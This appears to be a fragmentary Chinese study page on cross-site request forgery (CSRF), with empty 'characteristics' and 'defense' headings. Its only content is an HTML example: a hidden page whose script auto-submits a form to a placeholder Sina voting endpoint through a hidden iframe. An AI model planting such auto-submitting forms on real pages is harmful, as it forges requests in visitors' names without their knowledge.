CSRF
跨站请求伪造
原理
<body style="display: none;">
<form target="myIframe" id="csrf" action="新浪投票接口" method="POST">
<input type="text" name="content" value="csrf攻击" />
</form>
<!-- iframe 用来防止页面跳转 -->
<iframe id="myIframe" name="myIframe"></iframe>
<script>
var form = document.querySelector('#csrf');
form.submit();
</script>
</body>特点
防御
Last updated